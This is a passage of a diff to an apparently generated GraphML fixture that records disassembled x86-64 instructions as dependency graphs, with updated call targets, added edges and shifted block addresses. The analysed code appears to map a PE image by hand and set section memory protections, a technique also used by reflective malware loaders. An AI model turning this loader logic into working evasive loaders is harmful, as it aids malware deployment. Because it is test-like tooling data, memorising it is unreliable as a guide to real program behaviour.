-          <data key="instruction.source">call 0x1592</data>
+          <data key="instruction.hex">e89a040000</data>
+          <data key="instruction.source">call 0x158e</data>
         </node>
         <edge source="block.0x10e3:instruction.0x10e3" target="block.0x10e3:instruction.0x10e7"/>
+        <edge source="block.0x10e3:instruction.0x10e3" target="block.0x10e3:instruction.0x10ef"/>
         <edge source="block.0x10e3:instruction.0x10e7" target="block.0x10e3:instruction.0x10eb"/>
         <edge source="block.0x10e3:instruction.0x10eb" target="block.0x10e3:instruction.0x10ef"/>
       </graph>
@@ -700,14 +705,17 @@
         <node id="block.0x110c:instruction.0x111d">
           <data key="address">0x111d</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8a8040000</data>
-          <data key="instruction.source">call 0x15ca</data>
+          <data key="instruction.hex">e8a4040000</data>
+          <data key="instruction.source">call 0x15c6</data>
         </node>
         <edge source="block.0x110c:instruction.0x110c" target="block.0x110c:instruction.0x110f"/>
         <edge source="block.0x110c:instruction.0x110c" target="block.0x110c:instruction.0x1119"/>
+        <edge source="block.0x110c:instruction.0x110f" target="block.0x110c:instruction.0x1117"/>
         <edge source="block.0x110c:instruction.0x110f" target="block.0x110c:instruction.0x111d"/>
         <edge source="block.0x110c:instruction.0x1113" target="block.0x110c:instruction.0x1117"/>
+        <edge source="block.0x110c:instruction.0x1113" target="block.0x110c:instruction.0x111d"/>
         <edge source="block.0x110c:instruction.0x1117" target="block.0x110c:instruction.0x1119"/>
+        <edge source="block.0x110c:instruction.0x1117" target="block.0x110c:instruction.0x111d"/>
         <edge source="block.0x110c:instruction.0x1119" target="block.0x110c:instruction.0x111d"/>
       </graph>
     </node>
@@ -931,6 +939,7 @@
           <data key="instruction.source">je 0x1260</data>
         </node>
         <edge source="block.0x116f:instruction.0x116f" target="block.0x116f:instruction.0x1176"/>
+        <edge source="block.0x116f:instruction.0x116f" target="block.0x116f:instruction.0x1179"/>
         <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1179"/>
         <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1180"/>
         <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1183"/>
@@ -993,10 +1002,11 @@
         <node id="block.0x1198:instruction.0x11a4">
           <data key="address">0x11a4</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8e9030000</data>
-          <data key="instruction.source">call 0x1592</data>
+          <data key="instruction.hex">e8e5030000</data>
+          <data key="instruction.source">call 0x158e</data>
         </node>
         <edge source="block.0x1198:instruction.0x1198" target="block.0x1198:instruction.0x119c"/>
+        <edge source="block.0x1198:instruction.0x1198" target="block.0x1198:instruction.0x11a4"/>
         <edge source="block.0x1198:instruction.0x119c" target="block.0x1198:instruction.0x11a0"/>
         <edge source="block.0x1198:instruction.0x11a0" target="block.0x1198:instruction.0x11a4"/>
       </graph>
@@ -1082,14 +1092,17 @@
         <node id="block.0x11c1:instruction.0x11d2">
           <data key="address">0x11d2</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8f3030000</data>
-          <data key="instruction.source">call 0x15ca</data>
+          <data key="instruction.hex">e8ef030000</data>
+          <data key="instruction.source">call 0x15c6</data>
         </node>
         <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11c4"/>
         <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11ce"/>
+        <edge source="block.0x11c1:instruction.0x11c4" target="block.0x11c1:instruction.0x11cc"/>
         <edge source="block.0x11c1:instruction.0x11c4" target="block.0x11c1:instruction.0x11d2"/>
         <edge source="block.0x11c1:instruction.0x11c8" target="block.0x11c1:instruction.0x11cc"/>
+        <edge source="block.0x11c1:instruction.0x11c8" target="block.0x11c1:instruction.0x11d2"/>
         <edge source="block.0x11c1:instruction.0x11cc" target="block.0x11c1:instruction.0x11ce"/>
+        <edge source="block.0x11c1:instruction.0x11cc" target="block.0x11c1:instruction.0x11d2"/>
         <edge source="block.0x11c1:instruction.0x11ce" target="block.0x11c1:instruction.0x11d2"/>
       </graph>
     </node>
@@ -1376,6 +1389,7 @@
           <data key="instruction.source">je 0x1260</data>
         </node>
         <edge source="block.0x123b:instruction.0x123b" target="block.0x123b:instruction.0x1242"/>
+        <edge source="block.0x123b:instruction.0x123b" target="block.0x123b:instruction.0x1245"/>
         <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x1245"/>
         <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x124c"/>
         <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x124f"/>
@@ -1684,20 +1698,22 @@
         <node id="block.0x129c:instruction.0x12e9">
           <data key="address">0x12e9</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8f0020000</data>
-          <data key="instruction.source">call 0x15de</data>
+          <data key="instruction.hex">e892020000</data>
+          <data key="instruction.source">call 0x1580</data>
         </node>
         <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12a0"/>
         <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12a3"/>
+        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12b2"/>
         <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12c1"/>
         <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12a3"/>
+        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12a7"/>
         <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12af"/>
         <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12c1"/>
         <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12a7"/>
         <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12af"/>
         <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12b7"/>
         <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12c1"/>
-        <edge source="block.0x129c:instruction.0x12a7" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12a7" target="block.0x129c:instruction.0x12b2"/>
         <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12af"/>
         <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12b2"/>
         <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12bc"/>
@@ -1718,6 +1734,7 @@
         <edge source="block.0x129c:instruction.0x12cd" target="block.0x129c:instruction.0x12e9"/>
         <edge source="block.0x129c:instruction.0x12d0" target="block.0x129c:instruction.0x12e9"/>
         <edge source="block.0x129c:instruction.0x12d5" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12dd" target="block.0x129c:instruction.0x12e5"/>
         <edge source="block.0x129c:instruction.0x12dd" target="block.0x129c:instruction.0x12e9"/>
         <edge source="block.0x129c:instruction.0x12e5" target="block.0x129c:instruction.0x12e9"/>
       </graph>
@@ -1766,6 +1783,8 @@
         </node>
         <edge source="block.0x12ee:instruction.0x12ee" target="block.0x12ee:instruction.0x12f3"/>
         <edge source="block.0x12ee:instruction.0x12ee" target="block.0x12ee:instruction.0x12f7"/>
+        <edge source="block.0x12ee:instruction.0x12f7" target="block.0x12ee:instruction.0x12fb"/>
+        <edge source="block.0x12ee:instruction.0x12f7" target="block.0x12ee:instruction.0x1304"/>
       </graph>
     </node>
     <node id="block.0x1308">
@@ -2037,6 +2056,7 @@
           <data key="instruction.source">call qword ptr [rbp - 8]</data>
         </node>
         <edge source="block.0x1368:instruction.0x1368" target="block.0x1368:instruction.0x136c"/>
+        <edge source="block.0x1368:instruction.0x1368" target="block.0x1368:instruction.0x1373"/>
         <edge source="block.0x1368:instruction.0x136c" target="block.0x1368:instruction.0x136f"/>
         <edge source="block.0x1368:instruction.0x136f" target="block.0x1368:instruction.0x1373"/>
       </graph>
@@ -2245,6 +2265,7 @@
           <data key="instruction.source">call qword ptr [rbp - 0x10]</data>
         </node>
         <edge source="block.0x13b1:instruction.0x13b1" target="block.0x13b1:instruction.0x13b5"/>
+        <edge source="block.0x13b1:instruction.0x13b1" target="block.0x13b1:instruction.0x13c6"/>
         <edge source="block.0x13b1:instruction.0x13b5" target="block.0x13b1:instruction.0x13b8"/>
         <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13bc"/>
         <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13c0"/>
@@ -2436,6 +2457,7 @@
         </node>
         <edge source="block.0x13fa:instruction.0x13fa" target="block.0x13fa:instruction.0x1403"/>
         <edge source="block.0x13fa:instruction.0x13fe" target="block.0x13fa:instruction.0x1403"/>
+        <edge source="block.0x13fa:instruction.0x13fe" target="block.0x13fa:instruction.0x1406"/>
         <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x1406"/>
         <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x140a"/>
         <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x1412"/>
@@ -2864,740 +2886,769 @@
         <node id="block.0x14aa:instruction.0x14ad">
           <data key="address">0x14ad</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">0f8486000000</data>
-          <data key="instruction.source">je 0x1539</data>
+          <data key="instruction.hex">7478</data>
+          <data key="instruction.source">je 0x1527</data>
         </node>
         <edge source="block.0x14aa:instruction.0x14aa" target="block.0x14aa:instruction.0x14ad"/>
       </graph>
     </node>
-    <node id="block.0x14b3">
-      <data key="address">0x14b3</data>
+    <node id="block.0x14af">
+      <data key="address">0x14af</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x14b3</data>
+        <data key="address">0x14af</data>
         <data key="type">instructions</data>
-        <node id="block.0x14b3:instruction.0x14b3">
-          <data key="address">0x14b3</data>
+        <node id="block.0x14af:instruction.0x14af">
+          <data key="address">0x14af</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4508</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 8]</data>
         </node>
-        <node id="block.0x14b3:instruction.0x14b7">
-          <data key="address">0x14b7</data>
+        <node id="block.0x14af:instruction.0x14b3">
+          <data key="address">0x14b3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x14b3:instruction.0x14b9">
-          <data key="address">0x14b9</data>
+        <node id="block.0x14af:instruction.0x14b5">
+          <data key="address">0x14b5</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">7472</data>
-          <data key="instruction.source">je 0x152d</data>
+          <data key="instruction.hex">7467</data>
+          <data key="instruction.source">je 0x151e</data>
         </node>
-        <edge source="block.0x14b3:instruction.0x14b3" target="block.0x14b3:instruction.0x14b7"/>
-        <edge source="block.0x14b3:instruction.0x14b7" target="block.0x14b3:instruction.0x14b9"/>
+        <edge source="block.0x14af:instruction.0x14af" target="block.0x14af:instruction.0x14b3"/>
+        <edge source="block.0x14af:instruction.0x14b3" target="block.0x14af:instruction.0x14b5"/>
       </graph>
     </node>
-    <node id="block.0x14bb">
-      <data key="address">0x14bb</data>
+    <node id="block.0x14b7">
+      <data key="address">0x14b7</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x14bb</data>
+        <data key="address">0x14b7</data>
         <data key="type">instructions</data>
-        <node id="block.0x14bb:instruction.0x14bb">
-          <data key="address">0x14bb</data>
+        <node id="block.0x14b7:instruction.0x14b7">
+          <data key="address">0x14b7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4524</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0x24]</data>
         </node>
-        <node id="block.0x14bb:instruction.0x14bf">
-          <data key="address">0x14bf</data>
+        <node id="block.0x14b7:instruction.0x14bb">
+          <data key="address">0x14bb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1e81d</data>
           <data key="instruction.source">shr eax, 0x1d</data>
         </node>
-        <node id="block.0x14bb:instruction.0x14c2">
-          <data key="address">0x14c2</data>
+        <node id="block.0x14b7:instruction.0x14be">
+          <data key="address">0x14be</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">83e007</data>
           <data key="instruction.source">and eax, 7</data>
         </node>
-        <node id="block.0x14bb:instruction.0x14c5">
-          <data key="address">0x14c5</data>
+        <node id="block.0x14b7:instruction.0x14c1">
+          <data key="address">0x14c1</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">488d1d06000000</data>
-          <data key="instruction.source">lea rbx, [rip + 6]</data>
+          <data key="instruction.hex">e914010000</data>
+          <data key="instruction.source">jmp 0x15da</data>
         </node>
-        <node id="block.0x14bb:instruction.0x14cc">
-          <data key="address">0x14cc</data>
+        <edge source="block.0x14b7:instruction.0x14b7" target="block.0x14b7:instruction.0x14bb"/>
+        <edge source="block.0x14b7:instruction.0x14bb" target="block.0x14b7:instruction.0x14be"/>
+        <edge source="block.0x14b7:instruction.0x14be" target="block.0x14b7:instruction.0x14c1"/>
+      </graph>
+    </node>
+    <node id="block.0x14c6">
+      <data key="address">0x14c6</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x14c6</data>
+        <data key="type">instructions</data>
+        <node id="block.0x14c6:instruction.0x14c6">
+          <data key="address">0x14c6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop rbx</data>
+        </node>
+        <node id="block.0x14c6:instruction.0x14c7">
+          <data key="address">0x14c7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0fb61c03</data>
           <data key="instruction.source">movzx ebx, byte ptr [rbx + rax]</data>
         </node>
-        <node id="block.0x14bb:instruction.0x14d0">
-          <data key="address">0x14d0</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">eb08</data>
-          <data key="instruction.source">jmp 0x14da</data>
-        </node>
-        <edge source="block.0x14bb:instruction.0x14bb" target="block.0x14bb:instruction.0x14bf"/>
-        <edge source="block.0x14bb:instruction.0x14bf" target="block.0x14bb:instruction.0x14c2"/>
-        <edge source="block.0x14bb:instruction.0x14c2" target="block.0x14bb:instruction.0x14cc"/>
-        <edge source="block.0x14bb:instruction.0x14c5" target="block.0x14bb:instruction.0x14cc"/>
-        <edge source="block.0x14bb:instruction.0x14cc" target="block.0x14bb:instruction.0x14d0"/>
-      </graph>
-    </node>
-    <node id="block.0x14d2">
-      <data key="address">0x14d2</data>
-      <data key="type">data</data>
-      <data key="data.hex">0110022004400440</data>
-    </node>
-    <node id="block.0x14da">
-      <data key="address">0x14da</data>
-      <data key="type">instructions-graph</data>
-      <graph edgedefault="directed">
-        <data key="address">0x14da</data>
-        <data key="type">instructions</data>
-        <node id="block.0x14da:instruction.0x14da">
-          <data key="address">0x14da</data>
+        <node id="block.0x14c6:instruction.0x14cb">
+          <data key="address">0x14cb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec48</data>
           <data key="instruction.source">sub rsp, 0x48</data>
         </node>
-        <node id="block.0x14da:instruction.0x14de">
-          <data key="address">0x14de</data>
+        <node id="block.0x14c6:instruction.0x14cf">
+          <data key="address">0x14cf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b450c</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0xc]</data>
         </node>
-        <node id="block.0x14da:instruction.0x14e2">
-          <data key="address">0x14e2</data>
+        <node id="block.0x14c6:instruction.0x14d3">
+          <data key="address">0x14d3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x14da:instruction.0x14e6">
-          <data key="address">0x14e6</data>
+        <node id="block.0x14c6:instruction.0x14d7">
+          <data key="address">0x14d7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c1</data>
           <data key="instruction.source">add rcx, rax</data>
         </node>
-        <node id="block.0x14da:instruction.0x14e9">
-          <data key="address">0x14e9</data>
+        <node id="block.0x14c6:instruction.0x14da">
+          <data key="address">0x14da</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894c2430</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x30], rcx</data>
         </node>
-        <node id="block.0x14da:instruction.0x14ee">
-          <data key="address">0x14ee</data>
+        <node id="block.0x14c6:instruction.0x14df">
+          <data key="address">0x14df</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4508</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 8]</data>
         </node>
-        <node id="block.0x14da:instruction.0x14f2">
-          <data key="address">0x14f2</data>
+        <node id="block.0x14c6:instruction.0x14e3">
+          <data key="address">0x14e3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889442438</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x38], rax</data>
         </node>
-        <node id="block.0x14da:instruction.0x14f7">
-          <data key="address">0x14f7</data>
+        <node id="block.0x14c6:instruction.0x14e8">
+          <data key="address">0x14e8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c744244000000000</data>
           <data key="instruction.source">mov dword ptr [rsp + 0x40], 0</data>
         </node>
-        <node id="block.0x14da:instruction.0x14ff">
-          <data key="address">0x14ff</data>
+        <node id="block.0x14c6:instruction.0x14f0">
+          <data key="address">0x14f0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c7c1ffffffff</data>
           <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
         </node>
-        <node id="block.0x14da:instruction.0x1506">
-          <data key="address">0x1506</data>
+        <node id="block.0x14c6:instruction.0x14f7">
+          <data key="address">0x14f7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488d542430</data>
           <data key="instruction.source">lea rdx, [rsp + 0x30]</data>
         </node>
-        <node id="block.0x14da:instruction.0x150b">
-          <data key="address">0x150b</data>
+        <node id="block.0x14c6:instruction.0x14fc">
+          <data key="address">0x14fc</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d442438</data>
           <data key="instruction.source">lea r8, [rsp + 0x38]</data>
         </node>
-        <node id="block.0x14da:instruction.0x1510">
-          <data key="address">0x1510</data>
+        <node id="block.0x14c6:instruction.0x1501">
+          <data key="address">0x1501</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4189d9</data>
           <data key="instruction.source">mov r9d, ebx</data>
         </node>
-        <node id="block.0x14da:instruction.0x1513">
-          <data key="address">0x1513</data>
+        <node id="block.0x14c6:instruction.0x1504">
+          <data key="address">0x1504</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488d442440</data>
           <data key="instruction.source">lea rax, [rsp + 0x40]</data>
         </node>
-        <node id="block.0x14da:instruction.0x1518">
-          <data key="address">0x1518</data>
+        <node id="block.0x14c6:instruction.0x1509">
+          <data key="address">0x1509</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889442420</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x20], rax</data>
         </node>
-        <node id="block.0x14da:instruction.0x151d">
-          <data key="address">0x151d</data>
+        <node id="block.0x14c6:instruction.0x150e">
+          <data key="address">0x150e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b9568ffffff</data>
           <data key="instruction.source">mov r10, qword ptr [rbp - 0x98]</data>
         </node>
-        <node id="block.0x14da:instruction.0x1524">
-          <data key="address">0x1524</data>
+        <node id="block.0x14c6:instruction.0x1515">
+          <data key="address">0x1515</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e8b5000000</data>
-          <data key="instruction.source">call 0x15de</data>
+          <data key="instruction.hex">e866000000</data>
+          <data key="instruction.source">call 0x1580</data>
         </node>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14e6"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14e9"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14f2"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x14f7"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1506"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x150b"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1513"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1518"/>
-        <edge source="block.0x14da:instruction.0x14da" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x14de" target="block.0x14da:instruction.0x14e6"/>
-        <edge source="block.0x14da:instruction.0x14de" target="block.0x14da:instruction.0x14ee"/>
-        <edge source="block.0x14da:instruction.0x14e2" target="block.0x14da:instruction.0x14e6"/>
-        <edge source="block.0x14da:instruction.0x14e6" target="block.0x14da:instruction.0x14e9"/>
-        <edge source="block.0x14da:instruction.0x14e6" target="block.0x14da:instruction.0x14ee"/>
-        <edge source="block.0x14da:instruction.0x14e6" target="block.0x14da:instruction.0x14ff"/>
-        <edge source="block.0x14da:instruction.0x14e9" target="block.0x14da:instruction.0x14ff"/>
-        <edge source="block.0x14da:instruction.0x14e9" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x14ee" target="block.0x14da:instruction.0x14f2"/>
-        <edge source="block.0x14da:instruction.0x14ee" target="block.0x14da:instruction.0x1513"/>
-        <edge source="block.0x14da:instruction.0x14f2" target="block.0x14da:instruction.0x1513"/>
-        <edge source="block.0x14da:instruction.0x14f2" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x14f7" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x14ff" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x1506" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x150b" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x1510" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x1513" target="block.0x14da:instruction.0x1518"/>
-        <edge source="block.0x14da:instruction.0x1513" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x1518" target="block.0x14da:instruction.0x1524"/>
-        <edge source="block.0x14da:instruction.0x151d" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14c6:instruction.0x14c6" target="block.0x14c6:instruction.0x14c7"/>
+        <edge source="block.0x14c6:instruction.0x14c6" target="block.0x14c6:instruction.0x14cb"/>
+        <edge source="block.0x14c6:instruction.0x14c7" target="block.0x14c6:instruction.0x14cf"/>
+        <edge source="block.0x14c6:instruction.0x14c7" target="block.0x14c6:instruction.0x14da"/>
+        <edge source="block.0x14c6:instruction.0x14c7" target="block.0x14c6:instruction.0x1501"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14d7"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14da"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14e3"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14e8"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14f7"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14fc"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x1504"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x1509"/>
+        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x14cf" target="block.0x14c6:instruction.0x14d7"/>
+        <edge source="block.0x14c6:instruction.0x14cf" target="block.0x14c6:instruction.0x14da"/>
+        <edge source="block.0x14c6:instruction.0x14cf" target="block.0x14c6:instruction.0x14df"/>
+        <edge source="block.0x14c6:instruction.0x14d3" target="block.0x14c6:instruction.0x14d7"/>
+        <edge source="block.0x14c6:instruction.0x14d3" target="block.0x14c6:instruction.0x14da"/>
+        <edge source="block.0x14c6:instruction.0x14d7" target="block.0x14c6:instruction.0x14da"/>
+        <edge source="block.0x14c6:instruction.0x14d7" target="block.0x14c6:instruction.0x14df"/>
+        <edge source="block.0x14c6:instruction.0x14d7" target="block.0x14c6:instruction.0x14f0"/>
+        <edge source="block.0x14c6:instruction.0x14da" target="block.0x14c6:instruction.0x14df"/>
+        <edge source="block.0x14c6:instruction.0x14da" target="block.0x14c6:instruction.0x14f0"/>
+        <edge source="block.0x14c6:instruction.0x14da" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x14df" target="block.0x14c6:instruction.0x14e3"/>
+        <edge source="block.0x14c6:instruction.0x14df" target="block.0x14c6:instruction.0x1504"/>
+        <edge source="block.0x14c6:instruction.0x14e3" target="block.0x14c6:instruction.0x1504"/>
+        <edge source="block.0x14c6:instruction.0x14e3" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x14e8" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x14f0" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x14f7" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x14fc" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x1501" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x1504" target="block.0x14c6:instruction.0x1509"/>
+        <edge source="block.0x14c6:instruction.0x1504" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x1509" target="block.0x14c6:instruction.0x150e"/>
+        <edge source="block.0x14c6:instruction.0x1509" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c6:instruction.0x150e" target="block.0x14c6:instruction.0x1515"/>
       </graph>
     </node>
-    <node id="block.0x1529">
-      <data key="address">0x1529</data>
+    <node id="block.0x151a">
+      <data key="address">0x151a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1529</data>
+        <data key="address">0x151a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1529:instruction.0x1529">
-          <data key="address">0x1529</data>
+        <node id="block.0x151a:instruction.0x151a">
+          <data key="address">0x151a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c448</data>
           <data key="instruction.source">add rsp, 0x48</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x152d">
-      <data key="address">0x152d</data>
+    <node id="block.0x151e">
+      <data key="address">0x151e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x152d</data>
+        <data key="address">0x151e</data>
         <data key="type">instructions</data>
-        <node id="block.0x152d:instruction.0x152d">
-          <data key="address">0x152d</data>
+        <node id="block.0x151e:instruction.0x151e">
+          <data key="address">0x151e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4983c528</data>
           <data key="instruction.source">add r13, 0x28</data>
         </node>
-        <node id="block.0x152d:instruction.0x1531">
-          <data key="address">0x1531</data>
+        <node id="block.0x151e:instruction.0x1522">
+          <data key="address">0x1522</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffcf</data>
           <data key="instruction.source">dec r15d</data>
         </node>
-        <node id="block.0x152d:instruction.0x1534">
-          <data key="address">0x1534</data>
+        <node id="block.0x151e:instruction.0x1525">
+          <data key="address">0x1525</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e971ffffff</data>
+          <data key="instruction.hex">eb83</data>
           <data key="instruction.source">jmp 0x14aa</data>
         </node>
-        <edge source="block.0x152d:instruction.0x152d" target="block.0x152d:instruction.0x1531"/>
-        <edge source="block.0x152d:instruction.0x1531" target="block.0x152d:instruction.0x1534"/>
+        <edge source="block.0x151e:instruction.0x151e" target="block.0x151e:instruction.0x1522"/>
+        <edge source="block.0x151e:instruction.0x1522" target="block.0x151e:instruction.0x1525"/>
       </graph>
     </node>
-    <node id="block.0x1539">
-      <data key="address">0x1539</data>
+    <node id="block.0x1527">
+      <data key="address">0x1527</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1539</data>
+        <data key="address">0x1527</data>
         <data key="type">instructions</data>
-        <node id="block.0x1539:instruction.0x1539">
-          <data key="address">0x1539</data>
+        <node id="block.0x1527:instruction.0x1527">
+          <data key="address">0x1527</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1539:instruction.0x153d">
-          <data key="address">0x153d</data>
+        <node id="block.0x1527:instruction.0x152b">
+          <data key="address">0x152b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b413c</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
         </node>
-        <node id="block.0x1539:instruction.0x1540">
-          <data key="address">0x1540</data>
+        <node id="block.0x1527:instruction.0x152e">
+          <data key="address">0x152e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d2401</data>
           <data key="instruction.source">lea r12, [rcx + rax]</data>
         </node>
-        <node id="block.0x1539:instruction.0x1544">
-          <data key="address">0x1544</data>
+        <node id="block.0x1527:instruction.0x1532">
+          <data key="address">0x1532</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b442428</data>
           <data key="instruction.source">mov eax, dword ptr [r12 + 0x28]</data>
         </node>
-        <node id="block.0x1539:instruction.0x1549">
-          <data key="address">0x1549</data>
+        <node id="block.0x1527:instruction.0x1537">
+          <data key="address">0x1537</data>
